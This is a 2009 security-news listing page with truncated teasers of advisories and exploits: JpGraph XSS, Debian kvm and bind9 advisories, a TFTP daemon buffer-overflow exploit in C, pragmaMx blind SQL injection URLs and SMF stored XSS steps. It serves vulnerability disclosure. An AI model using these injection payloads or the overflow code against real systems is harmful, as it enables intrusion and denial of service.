XSS Vulnerability in JpGraph 3.0.6

Discovered by Martin Barbella <barbella@sas.upenn.edu>

Description of Vulnerability:
-----------------------------
JpGraph is an object oriented library for PHP that can be used to create
various types of graphs which also contains support for client side
image maps.

The GetURLArguments function for the JpGraph's Graph class does not
properly sanitize the names of get and post variables, leading to a
cross site scripting vulnerability.


Systems affected:
-----------------
This has been confirmed in version 3.0.6 of JpGraph's free release.
Previous versions and the professional versions may be affected as well.


Impact:
-------
When a user is tricked into clicking on a malicious link or submitting a
specially crafted form, the injected code travels to the vulnerable web
server, which reflects the att ... Read more »
Views: 9647 | Added by: b1zz4rd | Date: 24 December 2009 | Comments (0)

Hash: SHA1

- ------------------------------
------------------------------------------
Debian Security Advisory DSA-1962                  security@debian.org
http://www.debian.org/security/                      Giuseppe Iuculano
December 23, 2009                   http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : kvm
Vulnerability  : several vulnerabilities
Problem type   : local
Debian-specific: no
Debian bugs    : 557739 562075 562076
CVE Ids   &nb ... Read more »
Views: 931 | Added by: b1zz4rd | Date: 24 December 2009 | Comments (0)

Hash: SHA1

- ------------------------------
------------------------------------------
Debian Security Advisory DSA-1961-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
December 23, 2009                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : bind9
Vulnerability  : DNS cache poisoning
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-4022
... Read more »
Views: 7546 | Added by: b1zz4rd | Date: 24 December 2009 | Comments (0)

//############################
####################
//
//Vulnerability: Remote Buffer Overflow Exploit
//Impact: Remote Denial of Service Attack
//Vulnerable Application: TFTP Daemon Version 1.9
//Tested on Windows XP Service Pack II
//
//Author: Socket_0x03
//Contact: Socket_0x03@teraexe.com
//Website: www.teraexe.com
//
//################################################

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "ws2_32.lib")

char Buffer_Overflow[] =
"\x00\x02"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes...
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\ ... Read more »
Views: 4659 | Added by: b1zz4rd | Date: 24 December 2009 | Comments (0)

============================================
||| Security Advisory AKLINK-SA-2009-001 |||
||| CVE-2009-3580 (CVE candidate)        |||
||| CVE-2009-3581 (CVE candidate)        |||
||| CVE-2009-3582 (CVE candidate)        |||
||| CVE-2009-3583 (CVE candidate)        |||
||| CVE-2009-3584 (CVE candidate)        |||
============================================

SQL-Ledger – several issues
===========================

Date released: 21.12.2009
Date reported: 28.07.2009
$Revision: 1.1 $

by Alexander Klink
  Fraunhofer Institute for Secure Information Technology
  alexander.klink@sit.fraunhofer.de
  h ... Read more »
Views: 9150 | Added by: b1zz4rd | Date: 24 December 2009 | Comments (0)

##############################
#############
#
# CMS Name : pragmaMx ( All Version )
#
# Bug Type : Blind SQL/XPath Injection vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full%29/pragmaMx%200.1.11/pragmaMx_0.1.11.0.tar.gz/download
#

###########################################

PoC :

http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@address.tst
http://[target]/[path]/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337- ... Read more »
Views: 8608 | Added by: b1zz4rd | Date: 24 December 2009 | Comments (1)

|| Script : SMF (Simple Machine Forum) 1.1.11
|| Vulnerability Type : Active XSS ( Active Cross Site Scripting )
|| Risk : Low

|| Discovered By Khashayar Fereidani
|| http://ircrash.com http://bugtraq.ircrash.com


|| Note :

For use this vulnerability you need access to censor words panel .
1.First login and go to : http://site/path/index.php?action=postsettings;sa=censor
click on "Click here to add another word." for add new row .
set new text box : ircrash => "<script>alert('Vulnerable')</
script>
and save page .
2.Open new typic and set title : ircrash , fill all fields and post typic .
3.Open forum home page . you see alert : Vulerable

You can set any html or java s ... Read more »
Views: 3560 | Added by: b1zz4rd | Date: 24 December 2009 | Comments (1)

close